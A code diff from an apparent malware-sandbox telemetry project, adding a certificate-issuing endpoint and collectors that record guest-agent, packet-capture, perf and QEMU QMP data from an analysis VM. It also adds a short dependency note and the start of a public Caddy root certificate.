+_HOST_ID_RE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")
+
+
+def _is_valid_host_id(s: str) -> bool:
+    return bool(_HOST_ID_RE.match(s))
+
+
+def make_app(
+    *,
+    issuer_script: Path,
+    issued_root: Path,
+    rate_limit_window_s: float = 5.0,
+) -> Starlette:
+    """Build the Starlette app. Wired by the production launcher in
+    ``bootstrap/__main__.py``; tests can pass synthetic paths."""
+    issued_root.mkdir(parents=True, exist_ok=True)
+
+    # Coarse per-IP rate limiter to make a casual scan annoying. Not
+    # a real defense — the WG mesh is the actual perimeter.
+    last_request: dict[str, float] = {}
+
+    async def health(request: Request) -> Response:
+        return JSONResponse({"status": "ok"})
+
+    async def get_cert(request: Request) -> Response:
+        host_id: str = request.path_params["host_id"]
+        if not _is_valid_host_id(host_id):
+            return JSONResponse({"error": "bad host_id"}, status_code=400)
+
+        # Caddy forwards the original WG-side IP via X-Real-IP /
+        # X-Forwarded-For; fall back to the direct peer if running
+        # without Caddy in front (tests).
+        src = (
+            request.headers.get("x-real-ip")
+            or (request.headers.get("x-forwarded-for") or "").split(",")[0].strip()
+            or (request.client.host if request.client else "?")
+        )
+
+        now = time.monotonic()
+        prev = last_request.get(src, 0.0)
+        if (now - prev) < rate_limit_window_s:
+            return JSONResponse(
+                {"error": "rate limited; back off"},
+                status_code=429,
+            )
+        last_request[src] = now
+
+        tar_path = issued_root / host_id / f"{host_id}.tar"
+        if not tar_path.exists():
+            log.info("minting cert for host_id=%s src=%s", host_id, src)
+            try:
+                subprocess.run(
+                    [
+                        str(issuer_script), host_id,
+                        "--out-dir", str(issued_root / host_id),
+                    ],
+                    check=True,
+                    capture_output=True,
+                    text=True,
+                    timeout=30,
+                )
+            except subprocess.CalledProcessError as e:
+                log.error("issue script failed for %s: rc=%d stderr=%s",
+                          host_id, e.returncode, e.stderr[:500])
+                return JSONResponse(
+                    {"error": "mint failed", "detail": e.stderr[:500]},
+                    status_code=500,
+                )
+            except (OSError, subprocess.TimeoutExpired) as e:
+                log.exception("issue script transport error for %s", host_id)
+                return JSONResponse(
+                    {"error": f"transport: {e}"},
+                    status_code=500,
+                )
+        else:
+            log.info("cache hit for host_id=%s src=%s", host_id, src)
+
+        if not tar_path.exists():
+            return JSONResponse({"error": "tarball not produced"}, status_code=500)
+        return FileResponse(
+            tar_path,
+            media_type="application/x-tar",
+            filename=f"{host_id}.tar",
+            headers={
+                "X-Cis490-Host-Id": host_id,
+                "X-Cis490-Cert-Source-IP": src,
+            },
+        )
+
+    routes = [
+        Route("/v1/health", health, methods=["GET"]),
+        Route("/v1/cert/{host_id}", get_cert, methods=["GET"]),
+    ]
+    return Starlette(routes=routes)
--- a/collectors/guest_agent.py
+++ b/collectors/guest_agent.py
@ -0,0 +1,119 @@
+"""Source 5 (feature, deployable): in-guest agent reader.
+
+QEMU exposes a virtio-serial channel two ways:
+  - inside the guest: ``/dev/virtio-ports/cis490.guest.agent``
+  - on the host:      a unix socket at ``$RUN_DIR/agent.sock``
+
+The in-guest agent (`vm/guest-agent/cis490_agent.py`) writes one
+JSON-lines row per tick into the guest-side device. Bytes traverse the
+virtio bus and surface on the host socket. This collector reads them,
+re-stamps with the host's monotonic clock (so rows align with all
+other telemetry on a single timeline), and persists to
+``telemetry-guest.jsonl``.
+
+Why re-stamp? The agent's clock is the *guest* clock, which can drift
+from the host (rare in KVM, but happens during live-migration tests
+and on heavy host load). The original guest timestamps stay in the row
+under ``t_guest_*`` so analysts can quantify drift if they care.
+
+This source is the **deployable** side: every row is tagged
+``available_in_deployment: true``. See docs/threat-model.md.
+"""
+
+from __future__ import annotations
+
+import json
+import logging
+import socket
+import threading
+import time
+from pathlib import Path
+
+
+log = logging.getLogger("cis490.collectors.guest_agent")
+
+SOURCE = "guest_agent"
+AVAILABLE_IN_DEPLOYMENT = True
+
+
+def _connect(socket_path: Path, timeout_s: float) -> socket.socket | None:
+    deadline = time.monotonic() + timeout_s
+    last_err: OSError | None = None
+    while time.monotonic() < deadline:
+        try:
+            s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
+            s.settimeout(2.0)
+            s.connect(str(socket_path))
+            return s
+        except OSError as e:
+            last_err = e
+            time.sleep(0.5)
+    if last_err is not None:
+        log.warning("guest-agent socket %s never came up: %s", socket_path, last_err)
+    return None
+
+
+def _stamp(row: dict, t_mono_origin_ns: int) -> dict:
+    """Replace the agent's wall-only timestamps with host-clock ones,
+    keeping the originals under ``t_guest_*`` for drift analysis."""
+    out = dict(row)
+    out.setdefault("t_guest_mono_ns", row.get("t_guest_mono_ns"))
+    out.setdefault("t_guest_wall_ns", row.get("t_guest_wall_ns"))
+    out["t_mono_ns"] = time.monotonic_ns() - t_mono_origin_ns
+    out["t_wall_ns"] = time.time_ns()
+    out.setdefault("source", SOURCE)
+    out.setdefault("available_in_deployment", AVAILABLE_IN_DEPLOYMENT)
+    return out
+
+
+def run_loop(
+    socket_path: str | Path,
+    output_path: Path,
+    t_mono_origin_ns: int,
+    stop_event: threading.Event,
+    *,
+    connect_timeout_s: float = 30.0,
+) -> int:
+    """Read agent JSON-lines from the host-side virtio-serial unix
+    socket. Re-stamp each row with the host clock and persist."""
+    sock_path = Path(socket_path)
+    sock = _connect(sock_path, connect_timeout_s)
+    if sock is None:
+        return 0
+
+    rows = 0
+    output_path.parent.mkdir(parents=True, exist_ok=True)
+    buf = b""
+    try:
+        with output_path.open("a", buffering=1) as f:
+            while not stop_event.is_set():
+                try:
+                    sock.settimeout(0.5)
+                    chunk = sock.recv(8192)
+                except socket.timeout:
+                    continue
+                except OSError as e:
+                    log.warning("guest-agent recv failed: %s", e)
+                    break
+                if not chunk:
+                    log.info("guest-agent socket closed")
+                    break
+                buf += chunk
+                while b"\n" in buf:
+                    line, _, buf = buf.partition(b"\n")
+                    line = line.strip()
+                    if not line:
+                        continue
+                    try:
+                        row = json.loads(line)
+                    except json.JSONDecodeError as e:
+                        log.warning("dropping malformed guest-agent line: %s", e)
+                        continue
+                    f.write(json.dumps(_stamp(row, t_mono_origin_ns)) + "\n")
+                    rows += 1
+    finally:
+        try:
+            sock.close()
+        except OSError:
+            pass
+    return rows
--- a/collectors/pcap.py
+++ b/collectors/pcap.py
@ -0,0 +1,288 @@
+"""Source 4 (feature, deployable): bridge-side pcap + bucketed netflow.
+
+Captures packets on the host-only ``br-malware`` bridge during an
+episode, writes the raw pcap, and produces a bucketed JSONL file the
+trainer can consume directly.
+
+The capture is **gateway-side** — the orchestrator sees the same
+packets a real upstream router/gateway would see in deployment, so
+features derived here transfer 1:1 to the deployment-time gateway
+observer.
+
+Implementation:
+
+  - ``run_capture()`` spawns ``tcpdump -i <bridge> -U -w <out.pcap>``
+    as a subprocess for the episode duration. ``-U`` flushes per
+    packet so the file is consumable mid-flight.
+
+  - ``bucketize()`` reads a finished pcap and emits 100 ms-bucketed
+    rows into ``netflow.jsonl``. Pure-Python pcap parser (no scapy /
+    dpkt dependency); decodes Ethernet + IPv4 + TCP/UDP enough to fill
+    the schema in docs/data-model.md.
+
+The pure-Python parser is intentionally minimal — it does NOT do
+fragment reassembly, IPv6, VLAN tags, or anything fancy. It handles
+the cases that occur on a host-only bridge for malware behaviour:
+plain Ethernet II, IPv4, TCP/UDP. Other frames are still counted at
+the byte/packet level but skipped for protocol-specific stats.
+"""
+
+from __future__ import annotations
+
+import json
+import logging
+import os
+import struct
+import subprocess
+import threading
+import time
+from collections import defaultdict
+from dataclasses import dataclass
+from pathlib import Path
+
+
+log = logging.getLogger("cis490.collectors.pcap")
+
+SOURCE = "bridge_pcap"
+AVAILABLE_IN_DEPLOYMENT = True
+
+# Pcap file-level header
+_PCAP_GLOBAL_HDR = "<IHHiIII"
+_PCAP_GLOBAL_HDR_SIZE = 24
+_PCAP_REC_HDR = "<IIII"
+_PCAP_REC_HDR_SIZE = 16
+_PCAP_MAGIC_USEC = 0xa1b2c3d4
+_PCAP_MAGIC_NSEC = 0xa1b23c4d  # nanosecond resolution variant
+
+
+# ---------------------------------------------------------------------------
+# Capture
+# ---------------------------------------------------------------------------
+
+
+@dataclass
+class CaptureHandle:
+    proc: subprocess.Popen
+    pcap_path: Path
+    bridge: str
+    started_mono_ns: int
+
+
+def run_capture(
+    *,
+    bridge: str,
+    pcap_path: Path,
+    snaplen: int = 256,
+    bpf: str | None = None,
+) -> CaptureHandle:
+    """Start a tcpdump capture on ``bridge``. Returns a handle the
+    caller stops via ``stop_capture()``."""
+    pcap_path.parent.mkdir(parents=True, exist_ok=True)
+    args = ["tcpdump", "-i", bridge, "-U", "-s", str(snaplen), "-w", str(pcap_path)]
+    if bpf:
+        args.append(bpf)
+    log.info("starting pcap: %s", " ".join(args))
+    proc = subprocess.Popen(
+        args,
+        stdout=subprocess.DEVNULL,
+        stderr=subprocess.PIPE,
+        # tcpdump may need root or CAP_NET_RAW. We don't elevate here.
+    )
+    return CaptureHandle(
+        proc=proc, pcap_path=pcap_path, bridge=bridge,
+        started_mono_ns=time.monotonic_ns(),
+    )
+
+
+def stop_capture(handle: CaptureHandle, *, timeout_s: float = 5.0) -> int:
+    """SIGINT tcpdump (the Right Signal — flushes buffers + exits 0).
+    Returns the process exit code."""
+    proc = handle.proc
+    if proc.poll() is None:
+        proc.send_signal(2)  # SIGINT
+        try:
+            proc.wait(timeout=timeout_s)
+        except subprocess.TimeoutExpired:
+            proc.kill()
+            proc.wait(timeout=timeout_s)
+    return proc.returncode
+
+
+# ---------------------------------------------------------------------------
+# Pure-Python pcap parser
+# ---------------------------------------------------------------------------
+
+
+def _iter_pcap(path: Path):
+    """Yield ``(t_pkt_ns, frame_bytes)`` for every record in a pcap
+    file. Tolerates either microsecond or nanosecond magics."""
+    with path.open("rb") as f:
+        hdr = f.read(_PCAP_GLOBAL_HDR_SIZE)
+        if len(hdr) < _PCAP_GLOBAL_HDR_SIZE:
+            return
+        magic = struct.unpack("<I", hdr[:4])[0]
+        if magic == _PCAP_MAGIC_USEC:
+            sub_mult = 1000  # us → ns
+        elif magic == _PCAP_MAGIC_NSEC:
+            sub_mult = 1
+        else:
+            log.warning("unknown pcap magic %#x in %s", magic, path)
+            return
+        while True:
+            rec = f.read(_PCAP_REC_HDR_SIZE)
+            if len(rec) < _PCAP_REC_HDR_SIZE:
+                return
+            ts_sec, ts_sub, caplen, _ = struct.unpack(_PCAP_REC_HDR, rec)
+            data = f.read(caplen)
+            if len(data) < caplen:
+                return
+            t_ns = ts_sec * 1_000_000_000 + ts_sub * sub_mult
+            yield t_ns, data
+
+
+def _decode(frame: bytes) -> dict:
+    """Decode an Ethernet/IPv4/{TCP,UDP} frame to a flat dict. Unknown
+    protocols return only the ethertype + lengths."""
+    out: dict = {"size": len(frame)}
+    if len(frame) < 14:
+        return out
+    ethertype = struct.unpack(">H", frame[12:14])[0]
+    out["ethertype"] = ethertype
+    if ethertype != 0x0800:  # not IPv4 — count, don't decode further
+        return out
+    ip = frame[14:]
+    if len(ip) < 20:
+        return out
+    ihl = (ip[0] & 0x0F) * 4
+    if ihl < 20 or len(ip) < ihl:
+        return out
+    proto = ip[9]
+    src = ip[12:16]
+    dst = ip[16:20]
+    out["ip_proto"] = proto
+    out["src_ip"] = ".".join(str(b) for b in src)
+    out["dst_ip"] = ".".join(str(b) for b in dst)
+    payload = ip[ihl:]
+    if proto == 6 and len(payload) >= 20:  # TCP
+        sport, dport, _, _, off_flags = struct.unpack(">HHIIH", payload[:14])
+        flags = off_flags & 0x003F
+        out["src_port"] = sport
+        out["dst_port"] = dport
+        out["tcp_flags"] = flags  # FIN=1 SYN=2 RST=4 PSH=8 ACK=16 URG=32
+    elif proto == 17 and len(payload) >= 8:  # UDP
+        sport, dport, _, _ = struct.unpack(">HHHH", payload[:8])
+        out["src_port"] = sport
+        out["dst_port"] = dport
+    return out
+
+
+def bucketize(
+    pcap_path: Path,
+    netflow_path: Path,
+    *,
+    bucket_ms: int = 100,
+    t_mono_origin_ns: int = 0,
+    bridge_ip: str = "10.200.0.1",
+) -> int:
+    """Read a pcap and emit one row per ``bucket_ms`` window into
+    ``netflow.jsonl``. The ``in/out`` direction is from the bridge
+    perspective (host = ``bridge_ip``):
+
+      out = packet whose src is the host-side address (host → guest)
+      in  = anything else seen on the bridge (guest → host or
+            guest-to-guest)
+
+    Returns the number of rows written."""
+    if not pcap_path.exists():
+        return 0
+    bucket_ns = bucket_ms * 1_000_000
+    netflow_path.parent.mkdir(parents=True, exist_ok=True)
+
+    rows = 0
+    bucket_start: int | None = None
+    agg: dict = _empty_bucket()
+    with netflow_path.open("a", buffering=1) as out:
+        for t_pkt_ns, frame in _iter_pcap(pcap_path):
+            d = _decode(frame)
+            # Establish first bucket origin on first packet.
+            if bucket_start is None:
+                bucket_start = t_pkt_ns - (t_pkt_ns % bucket_ns)
+            while t_pkt_ns >= bucket_start + bucket_ns:
+                _flush(out, agg, bucket_start, bucket_ns, t_mono_origin_ns)
+                rows += 1
+                agg = _empty_bucket()
+                bucket_start += bucket_ns
+            _accumulate(agg, d, bridge_ip)
+        if bucket_start is not None and any(v for v in agg.values() if v):
+            _flush(out, agg, bucket_start, bucket_ns, t_mono_origin_ns)
+            rows += 1
+    return rows
+
+
+def _empty_bucket() -> dict:
+    return {
+        "pkts_in": 0, "pkts_out": 0,
+        "bytes_in": 0, "bytes_out": 0,
+        "syn_count": 0, "fin_count": 0, "rst_count": 0,
+        "udp_count": 0, "tcp_count": 0,
+        "dns_query_count": 0,
+        "dst_ips": set(), "dst_ports": set(),
+        "tcp_new_flows": 0,
+    }
+
+
+def _accumulate(agg: dict, d: dict, bridge_ip: str) -> None:
+    sz = d.get("size", 0)
+    is_out = d.get("src_ip") == bridge_ip
+    if is_out:
+        agg["pkts_out"] += 1
+        agg["bytes_out"] += sz
+    else:
+        agg["pkts_in"] += 1
+        agg["bytes_in"] += sz
+
+    proto = d.get("ip_proto")
+    if proto == 6:
+        agg["tcp_count"] += 1
+        flags = d.get("tcp_flags", 0)
+        if flags & 0x02:  # SYN
+            agg["syn_count"] += 1
+            if not (flags & 0x10):  # SYN without ACK = new flow
+                agg["tcp_new_flows"] += 1
+        if flags & 0x01:
+            agg["fin_count"] += 1
+        if flags & 0x04:
+            agg["rst_count"] += 1
+    elif proto == 17:
+        agg["udp_count"] += 1
+        if d.get("dst_port") == 53:
+            agg["dns_query_count"] += 1
+
+    dst = d.get("dst_ip")
+    if dst:
+        agg["dst_ips"].add(dst)
+    dport = d.get("dst_port")
+    if dport is not None:
+        agg["dst_ports"].add(dport)
+
+
+def _flush(out, agg: dict, bucket_start_ns: int, bucket_ns: int, t_mono_origin_ns: int) -> None:
+    row = {
+        "t_mono_ns": bucket_start_ns - t_mono_origin_ns,
+        "t_wall_ns": bucket_start_ns,
+        "source": SOURCE,
+        "available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
+        "bucket_ms": bucket_ns // 1_000_000,
+        "pkts_in": agg["pkts_in"], "pkts_out": agg["pkts_out"],
+        "bytes_in": agg["bytes_in"], "bytes_out": agg["bytes_out"],
+        "syn_count": agg["syn_count"],
+        "fin_count": agg["fin_count"],
+        "rst_count": agg["rst_count"],
+        "udp_count": agg["udp_count"],
+        "tcp_count": agg["tcp_count"],
+        "dns_query_count": agg["dns_query_count"],
+        "unique_dst_ips": len(agg["dst_ips"]),
+        "unique_dst_ports": len(agg["dst_ports"]),
+        "tcp_new_flows": agg["tcp_new_flows"],
+    }
+    out.write(json.dumps(row) + "\n")
--- a/collectors/perf_qemu.py
+++ b/collectors/perf_qemu.py
@ -0,0 +1,201 @@
+"""Source 3 (oracle): ``perf stat -p <qemu_pid>`` sampler.
+
+Spawns ``perf stat`` in interval-JSON mode against the qemu pid and
+aggregates the per-event counter values into per-interval telemetry
+rows. Unlike the /proc and QMP collectors, perf needs CAP_SYS_ADMIN
+or ``kernel.perf_event_paranoid <= 1`` to read counters for a process
+the collector doesn't own — typically true on a lab host running
+QEMU under the cis490 service user.
+
+Source 3 is **oracle-only** — perf counters are not available on a
+deployed device. Every row carries ``available_in_deployment: false``.
+
+The events we ask for are the small canonical set named in
+docs/data-model.md:
+
+    cycles, instructions, cache-references, cache-misses,
+    branches, branch-misses, page-faults, context-switches
+
+Anything perf can't enable on the host (e.g. cache-misses without
+hardware support) is silently dropped from the row.
+"""
+
+from __future__ import annotations
+
+import json
+import logging
+import shutil
+import subprocess
+import threading
+import time
+from pathlib import Path
+
+
+log = logging.getLogger("cis490.collectors.perf_qemu")
+
+SOURCE = "host_perf"
+AVAILABLE_IN_DEPLOYMENT = False
+
+DEFAULT_EVENTS = (
+    "cycles",
+    "instructions",
+    "cache-references",
+    "cache-misses",
+    "branches",
+    "branch-misses",
+    "page-faults",
+    "context-switches",
+)
+
+
+def perf_available() -> bool:
+    return shutil.which("perf") is not None
+
+
+def _coerce_int(s: str | int | None) -> int | None:
+    if s is None:
+        return None
+    if isinstance(s, int):
+        return s
+    s = s.strip()
+    if not s or s in ("<not counted>", "<not supported>"):
+        return None
+    # perf prints comma-separated thousands by default; we asked -j so
+    # we usually get plain numbers, but guard for both shapes.
+    s = s.replace(",", "")
+    try:
+        return int(s)
+    except ValueError:
+        try:
+            return int(float(s))
+        except ValueError:
+            return None
+
+
+def _build_row(t_mono_origin_ns: int, interval_s: float, agg: dict[str, int]) -> dict:
+    cycles = agg.get("cycles")
+    insns = agg.get("instructions")
+    cache_refs = agg.get("cache-references")
+    cache_miss = agg.get("cache-misses")
+    ipc = (insns / cycles) if (cycles and insns) else None
+    miss_rate = (cache_miss / cache_refs) if (cache_refs and cache_miss is not None) else None
+
+    return {
+        "t_mono_ns": time.monotonic_ns() - t_mono_origin_ns,
+        "t_wall_ns": time.time_ns(),
+        "source": SOURCE,
+        "available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
+        "interval_s": interval_s,
+        "cycles": cycles,
+        "instructions": insns,
+        "cache_references": cache_refs,
+        "cache_misses": cache_miss,
+        "branches": agg.get("branches"),
+        "branch_misses": agg.get("branch-misses"),
+        "page_faults": agg.get("page-faults"),
+        "context_switches": agg.get("context-switches"),
+        "ipc": ipc,
+        "cache_miss_rate": miss_rate,
+    }
+
+
+def parse_perf_event_line(line: str) -> dict | None:
+    """Parse one ``perf stat -j`` event line. Returns None for blanks
+    or status messages perf occasionally interleaves on stderr-ish
+    paths but stdout-on-error in practice."""
+    line = line.strip()
+    if not line.startswith("{"):
+        return None
+    try:
+        return json.loads(line)
+    except json.JSONDecodeError:
+        return None
+
+
+def run_loop(
+    pid: int,
+    output_path: Path,
+    t_mono_origin_ns: int,
+    interval_ms: int,
+    stop_event: threading.Event,
+    *,
+    events: tuple[str, ...] = DEFAULT_EVENTS,
+) -> int:
+    """Spawn perf stat -j against ``pid`` and stream rows until stop.
+    Returns the number of rows written."""
+    if not perf_available():
+        log.warning("perf binary not on PATH — perf collector disabled")
+        return 0
+
+    cmd = [
+        "perf", "stat",
+        "-p", str(pid),
+        "-I", str(interval_ms),
+        "-j",
+        "-e", ",".join(events),
+    ]
+    log.info("starting perf: %s", " ".join(cmd))
+
+    try:
+        proc = subprocess.Popen(
+            cmd,
+            stdout=subprocess.PIPE,
+            stderr=subprocess.PIPE,
+            bufsize=1,
+            text=True,
+        )
+    except (FileNotFoundError, PermissionError) as e:
+        log.warning("perf launch failed: %s", e)
+        return 0
+
+    rows = 0
+    output_path.parent.mkdir(parents=True, exist_ok=True)
+    cur_interval: float | None = None
+    agg: dict[str, int] = {}
+
+    def _flush() -> None:
+        nonlocal rows
+        if cur_interval is None or not agg:
+            return
+        row = _build_row(t_mono_origin_ns, cur_interval, agg)
+        out_f.write(json.dumps(row) + "\n")
+        rows += 1
+
+    try:
+        with output_path.open("a", buffering=1) as out_f:
+            # perf interleaves events and writes to stdout in -j mode.
+            # We read line by line until the process exits (which
+            # happens when we kill it on stop, or when the target pid
+            # disappears and perf's internal -p polling notices).
+            assert proc.stdout is not None
+            for line in proc.stdout:
+                if stop_event.is_set():
+                    break
+                evt = parse_perf_event_line(line)
+                if evt is None:
+                    continue
+                interval = evt.get("interval")
+                event_name = evt.get("event")
+                value = _coerce_int(evt.get("counter-value"))
+                if interval is None or event_name is None:
+                    continue
+                # perf emits one JSON per (event, interval); a new
+                # interval value means we should flush the previous row.
+                if cur_interval is not None and interval != cur_interval:
+                    _flush()
+                    agg = {}
+                cur_interval = interval
+                if value is not None:
+                    agg[event_name] = value
+            # End of stream — flush the last partial row.
+            _flush()
+    finally:
+        if proc.poll() is None:
+            proc.terminate()
+            try:
+                proc.wait(timeout=3.0)
+            except subprocess.TimeoutExpired:
+                proc.kill()
+                proc.wait(timeout=2.0)
+
+    return rows
--- a/collectors/qmp.py
+++ b/collectors/qmp.py
@ -0,0 +1,262 @@
+"""Source 2 (oracle): QEMU QMP sampler.
+
+Connects to the QEMU monitor protocol socket exposed by the launcher
+($RUN_DIR/qmp.sock) and periodically queries the hypervisor for
+per-VM stats that don't show up in /proc/<qemu_pid>:
+
+  - per-disk block I/O (rd_bytes, wr_bytes, rd_ops, wr_ops)
+  - VM run state (running / paused / shutdown)
+  - per-netdev tx/rx counters (when available)
+  - KVM stat counters (when available; introspection differs by qemu
+    version, so anything we can't read is skipped silently)
+
+This source is **oracle-only** — it does not exist on a deployed
+device. Every row carries ``available_in_deployment: false``.
+
+Wire format: QMP is line-delimited JSON. The handshake is fixed:
+
+    server  → {"QMP": {capabilities: [...], version: ...}}
+    client  → {"execute": "qmp_capabilities"}
+    server  → {"return": {}}
+    (client may now issue commands)
+
+We use a dedicated synchronous client because QMP is request/response
+and we don't need pipelining; one query batch per tick keeps the
+on-disk schema simple.
+"""
+
+from __future__ import annotations
+
+import json
+import logging
+import socket
+import threading
+import time
+from dataclasses import dataclass
+from pathlib import Path
+from typing import Any
+
+
+log = logging.getLogger("cis490.collectors.qmp")
+
+SOURCE = "host_qmp"
+AVAILABLE_IN_DEPLOYMENT = False
+
+
+class QMPError(RuntimeError):
+    pass
+
+
+@dataclass
+class _SockReader:
+    sock: socket.socket
+    buf: bytes = b""
+
+    def read_line(self, timeout_s: float = 5.0) -> str:
+        deadline = time.monotonic() + timeout_s
+        while b"\n" not in self.buf:
+            self.sock.settimeout(max(0.1, deadline - time.monotonic()))
+            try:
+                chunk = self.sock.recv(8192)
+            except socket.timeout as e:
+                raise QMPError(f"QMP read timed out: {e}") from e
+            if not chunk:
+                raise QMPError("QMP connection closed by peer")
+            self.buf += chunk
+        line, _, rest = self.buf.partition(b"\n")
+        self.buf = rest
+        return line.decode("utf-8", errors="replace")
+
+
+class QMPClient:
+    """Tiny synchronous QMP client over a unix socket."""
+
+    def __init__(self, socket_path: str | Path) -> None:
+        self.path = str(socket_path)
+        self._sock: socket.socket | None = None
+        self._reader: _SockReader | None = None
+
+    def connect(self, timeout_s: float = 5.0) -> dict[str, Any]:
+        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
+        s.settimeout(timeout_s)
+        s.connect(self.path)
+        self._sock = s
+        self._reader = _SockReader(s)
+        # Read greeting.
+        greeting = json.loads(self._reader.read_line(timeout_s=timeout_s))
+        if "QMP" not in greeting:
+            raise QMPError(f"unexpected QMP greeting: {greeting!r}")
+        # Negotiate capabilities (no flags requested).
+        self.execute("qmp_capabilities")
+        return greeting["QMP"]
+
+    def execute(self, command: str, **arguments: Any) -> Any:
+        if self._sock is None or self._reader is None:
+            raise QMPError("not connected")
+        msg: dict[str, Any] = {"execute": command}
+        if arguments:
+            msg["arguments"] = arguments
+        body = (json.dumps(msg) + "\n").encode("utf-8")
+        self._sock.sendall(body)
+        # QMP can interleave async events with the response — drain
+        # until we see the matching {"return": ...} or {"error": ...}.
+        for _ in range(64):  # bounded to avoid an infinite loop on bugs
+            line = self._reader.read_line()
+            if not line.strip():
+                continue
+            resp = json.loads(line)
+            if "return" in resp:
+                return resp["return"]
+            if "error" in resp:
+                raise QMPError(f"{command}: {resp['error']}")
+            # Otherwise it's an async event; ignore and keep reading.
+        raise QMPError(f"{command}: too many async events without a response")
+
+    # ---- snapshot / revert (via human-monitor-command) -----------------
+
+    def savevm(self, name: str) -> str:
+        """``savevm <name>`` — capture a live VM snapshot inside the
+        qcow2. Returns the monitor's reply (empty string on success).
+        Requires the disk to be qcow2 (our launchers always are)."""
+        return self._hmp(f"savevm {name}")
+
+    def loadvm(self, name: str) -> str:
+        """``loadvm <name>`` — restore the named snapshot. The guest
+        is paused, restored, and resumed; collectors continue
+        sampling and just see a sharp transition."""
+        return self._hmp(f"loadvm {name}")
+
+    def _hmp(self, cmd: str) -> str:
+        out = self.execute("human-monitor-command", **{"command-line": cmd})
+        return out if isinstance(out, str) else ""
+
+    def close(self) -> None:
+        if self._sock is not None:
+            try:
+                self._sock.close()
+            except OSError:
+                pass
+            self._sock = None
+            self._reader = None
+
+
+# ---- row builders ----------------------------------------------------------
+
+
+def _flatten_blockstats(blockstats: list[dict] | None) -> dict[str, dict[str, int]]:
+    """Compact ``query-blockstats`` to ``{device: {rd_ops, wr_ops, ...}}``."""
+    out: dict[str, dict[str, int]] = {}
+    for entry in blockstats or []:
+        name = entry.get("device") or entry.get("qdev") or "unknown"
+        s = entry.get("stats") or {}
+        out[name] = {
+            "rd_ops": int(s.get("rd_operations", 0)),
+            "wr_ops": int(s.get("wr_operations", 0)),
+            "rd_bytes": int(s.get("rd_bytes", 0)),
+            "wr_bytes": int(s.get("wr_bytes", 0)),
+            "flush_ops": int(s.get("flush_operations", 0)),
+        }
+    return out
+
+
+def collect_once(client: QMPClient, t_mono_origin_ns: int) -> dict[str, Any]:
+    row: dict[str, Any] = {
+        "t_mono_ns": time.monotonic_ns() - t_mono_origin_ns,
+        "t_wall_ns": time.time_ns(),
+        "source": SOURCE,
+        "available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
+    }
+
+    # query-status is dirt cheap and tells us whether the guest is
+    # paused (rare) or running.
+    try:
+        status = client.execute("query-status")
+        row["vm_status"] = status.get("status")
+        row["vm_running"] = bool(status.get("running"))
+    except QMPError as e:
+        log.debug("query-status failed: %s", e)
+
+    try:
+        bs = client.execute("query-blockstats")
+        row["blockstats"] = _flatten_blockstats(bs)
+    except QMPError as e:
+        log.debug("query-blockstats failed: %s", e)
+
+    # query-stats is QEMU 7.1+ and the schema varies across versions.
+    # We only ask for KVM stats and tolerate any subset of fields.
+    try:
+        stats = client.execute("query-stats", target="vm")
+        row["kvm_stats"] = _summarize_query_stats(stats)
+    except QMPError as e:
+        log.debug("query-stats not supported: %s", e)
+
+    return row
+
+
+def _summarize_query_stats(stats_resp: list[dict] | dict) -> dict[str, int]:
+    """Reduce ``query-stats`` to a flat name→value map of integer
+    counters. The full payload is verbose and version-specific; we only
+    ever want individual scalar counters downstream."""
+    flat: dict[str, int] = {}
+    items = stats_resp if isinstance(stats_resp, list) else [stats_resp]
+    for entry in items:
+        for s in entry.get("stats", []) or []:
+            name = s.get("name")
+            value = s.get("value")
+            if isinstance(name, str) and isinstance(value, int):
+                flat[name] = value
+    return flat
+
+
+# ---- run loop --------------------------------------------------------------
+
+
+def run_loop(
+    socket_path: str | Path,
+    output_path: Path,
+    t_mono_origin_ns: int,
+    interval_ms: int,
+    stop_event: threading.Event,
+) -> int:
+    """Connect to ``socket_path`` and sample at ``interval_ms`` until
+    ``stop_event``. Returns the number of rows written.
+
+    A single missed sample (transient QMP error) is logged and skipped;
+    repeated failures terminate the loop so the episode finishes cleanly
+    rather than hanging on a dead hypervisor."""
+    interval_ns = interval_ms * 1_000_000
+    client = QMPClient(socket_path)
+    try:
+        client.connect(timeout_s=5.0)
+    except (OSError, QMPError) as e:
+        log.warning("QMP connect to %s failed: %s — collector exits cleanly", socket_path, e)
+        return 0
+
+    rows = 0
+    consecutive_failures = 0
+    next_tick = time.monotonic_ns()
+    output_path.parent.mkdir(parents=True, exist_ok=True)
+    try:
+        with output_path.open("a", buffering=1) as f:
+            while not stop_event.is_set():
+                try:
+                    row = collect_once(client, t_mono_origin_ns)
+                    f.write(json.dumps(row) + "\n")
+                    rows += 1
+                    consecutive_failures = 0
+                except (QMPError, OSError) as e:
+                    consecutive_failures += 1
+                    log.warning("QMP sample %d failed: %s", rows, e)
+                    if consecutive_failures >= 5:
+                        log.warning("5 consecutive QMP failures; bailing")
+                        break
+
+                next_tick += interval_ns
+                sleep_ns = next_tick - time.monotonic_ns()
+                if sleep_ns > 0:
+                    stop_event.wait(sleep_ns / 1_000_000_000)
+                else:
+                    next_tick = time.monotonic_ns()
+    finally:
+        client.close()
+    return rows
--- a/docs/sources.md
+++ b/docs/sources.md
@ -171,6 +171,10 @@ thing plays in our pipeline.
 - **pycdlib** — pure-Python ISO9660/Joliet/Rock Ridge builder. Used to
  produce the NoCloud cidata ISO without depending on system mkisofs/
  xorriso. https://clalancette.github.io/pycdlib/
+- **msgpack** — binary serialization used by Metasploit's RPC API. The
+  Tier-3 driver speaks msfrpcd's native msgpack-over-HTTPS so we don't
+  pull in a higher-level Metasploit Python client.
+  https://msgpack.org

 ---

--- a/etc/caddy-root.crt
+++ b/etc/caddy-root.crt
@ -0,0 +1,11 @@
+-----BEGIN CERTIFICATE-----
+MIIBpDCCAUqgAwIBAgIRAP15YNZS/guq4ES7RfuBBQQwCgYIKoZIzj0EAwIwMDEu
+MCwGA1UEAxMlQ2FkZHkgTG9jYWwgQXV0aG9yaXR5IC0gMjAyNiBFQ0MgUm9vdDAe
+Fw0yNjA0MjYxMzE5NTZaFw0zNjAzMDQxMzE5NTZaMDAxLjAsBgNVBAMTJUNhZGR5
+IExvY2FsIEF1dGhvcml0eSAtIDIwMjYgRUNDIFJvb3QwWTATBgcqhkjOPQIBBggq
